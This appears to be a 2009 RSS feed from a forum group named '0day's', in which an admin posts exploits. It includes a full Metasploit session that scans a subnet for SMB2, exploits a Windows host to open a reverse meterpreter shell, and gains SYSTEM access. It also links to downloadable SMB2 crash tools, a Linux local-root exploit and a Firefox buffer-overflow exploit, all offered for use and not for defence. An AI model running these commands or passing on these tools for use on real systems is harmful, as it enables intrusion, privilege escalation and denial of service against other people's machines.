<?xml version="1.0" ?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
	<title>illmob - Group: 0day\'s</title>
	<link>http://illmob.org/forum/?group=1</link>
	<description><![CDATA[Online Funhouse]]></description>
	<generator>Simple:Press Forum Version 4.1.0</generator>
	<atom:link href="http://illmob.org/forum/?group=1&#038;xfeed=group" rel="self" type="application/rss+xml" />
<item>
	<title>admin on Metasploit SMB2 code released</title>
	<link>http://illmob.org/forum/windows/metasploit-smb2-code-released/#p5</link>
	<category>Windows</category>
	<guid isPermaLink="true">http://illmob.org/forum/windows/metasploit-smb2-code-released/#p5</guid>
	<description><![CDATA[<p>Metasploit released the long-awaited <a href="http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/smb/smb2_negotiate_func_index.rb" target="_blank">SMB2 code execution module</a> for the Metasploit Framework.</p>
<br />
<p>msf&#62; use auxiliary/scanner/smb/smb2<br />msf (auxiliary/smb2) &#62; set RHOSTS 192.168.0.0/24<br />msf (auxiliary/smb2) &#62; set THREADS 100<br />msf (auxiliary/smb2) &#62; run<br /><br />[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours<br />[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours<br /><br />When using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMWare. <br /><br />Now that we have identified two systems with SMB2 enabled, its exploit time!<br /><br />msf&#62; use exploit/windows/smb/smb2_negotiate_func_index<br />msf (exploit/smb2) &#62; set PAYLOAD windows/meterpreter/reverse_tcp<br />msf (exploit/smb2) &#62; set LHOST 192.168.0.136<br />msf (exploit/smb2) &#62; set LPORT 5678<br />msf (exploit/smb2) &#62; set RHOST 192.168.0.211<br />msf (exploit/smb2) &#62; exploit<br /><br />[*] Started reverse handler<br />[*] Connecting to the target (192.168.0.211:445)...<br />[*] Sending the exploit packet (854 bytes)...<br />[*] Waiting up to 180 seconds for exploit to trigger...<br />[*] Sending stage (719360 bytes)<br />[*] Meterpreter session 2 opened (192.168.0.136:5678 -&#62; 192.168.0.211:49158)<br /><br />meterpreter &#62; sysinfo<br />Computer: WIN-UAKGQGDWLX2<br />OS      : Windows 2008 (Build 6001, Service Pack 1).<br />Arch    : x86<br />Language: en_US<br /><br />meterpreter &#62; getuid<br />Server username: NT AUTHORITYSYSTEM<br /><br />Game Over.</p>
]]></description>
	<pubDate>Tue, 29 Sep 2009 09:45:18 +0400</pubDate>
</item>
<item>
	<title>admin on Vista/Win7 smb2 remote BSOD - exe and perl code</title>
	<link>http://illmob.org/forum/windows/vistawin7-smb2-remote-bsod-exe-and-perl-code/#p4</link>
	<category>Windows</category>
	<guid isPermaLink="true">http://illmob.org/forum/windows/vistawin7-smb2-remote-bsod-exe-and-perl-code/#p4</guid>
	<description><![CDATA[<p>and java</p>
<p><a href="http://www.procyonlabs.com/software/smb2_bsoder/SMB2_BSODer.jar" rel="nofollow">http://www.procyonlabs.com/sof.....BSODer.jar</a></p>
<p>Usage: java -jar SMB2_BSODer.jar</p>
<br />
<p>source code:</p>
<p><a href="http://www.procyonlabs.com/software/smb2_bsoder/Main.java" rel="nofollow">http://www.procyonlabs.com/sof...../Main.java</a></p>
]]></description>
	<pubDate>Fri, 18 Sep 2009 20:04:38 +0400</pubDate>
</item>
<item>
	<title>admin on Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit</title>
	<link>http://illmob.org/forum/linux/linux-kernel-2426-sock_sendpage-local-root-exploit/#p3</link>
	<category>Linux</category>
	<guid isPermaLink="true">http://illmob.org/forum/linux/linux-kernel-2426-sock_sendpage-local-root-exploit/#p3</guid>
	<description><![CDATA[<pre><pre>This is the second version of Linux sock_sendpage() NULL pointer<br /><br />dereference exploit. Now, it also works with Linux kernel versions<br /><br />which implements COW credentials (e.g. Fedora 11). For SELinux enforced<br /><br />systems, it automatically searches in the SELinux policy rules for<br /><br />types with mmap_zero permission it can transition, and tries to exploit<br /><br />the system with that types.<br /></pre>
<br /><br /><br /><a rel="nofollow" href="http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz" target="_blank">http://milw0rm.com/sploits/200.....ge2.tar.gz</a><br /></pre>
]]></description>
	<pubDate>Tue, 15 Sep 2009 06:57:35 +0400</pubDate>
</item>
<item>
	<title>admin on &#62;Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow</title>
	<link>http://illmob.org/forum/windows/mozilla-firefox-20016-utf-8-url-remote-buffer-overflow/#p2</link>
	<category>Windows</category>
	<guid isPermaLink="true">http://illmob.org/forum/windows/mozilla-firefox-20016-utf-8-url-remote-buffer-overflow/#p2</guid>
	<description><![CDATA[<p><a href="http://milw0rm.com/exploits/9663" rel="nofollow">http://milw0rm.com/exploits/9663</a></p>
<p>tested on xp sp3</p>
]]></description>
	<pubDate>Tue, 15 Sep 2009 06:54:55 +0400</pubDate>
</item>
<item>
	<title>admin on Vista/Win7 smb2 remote BSOD - exe and perl code</title>
	<link>http://illmob.org/forum/windows/vistawin7-smb2-remote-bsod-exe-and-perl-code/#p1</link>
	<category>Windows</category>
	<guid isPermaLink="true">http://illmob.org/forum/windows/vistawin7-smb2-remote-bsod-exe-and-perl-code/#p1</guid>
	<description><![CDATA[<p><a rel="nofollow" href="/smb2nuke.exe" target="_blank" target="_blank">http://illmob.org/smb2nuke.exe</a></p>
<br /> <a rel="nofollow" href="/smb2nuke.pl" target="_blank" target="_blank">http://illmob.org/smb2nuke.pl</a>
]]></description>
	<pubDate>Tue, 15 Sep 2009 02:18:59 +0400</pubDate>
</item>
</channel>
</rss>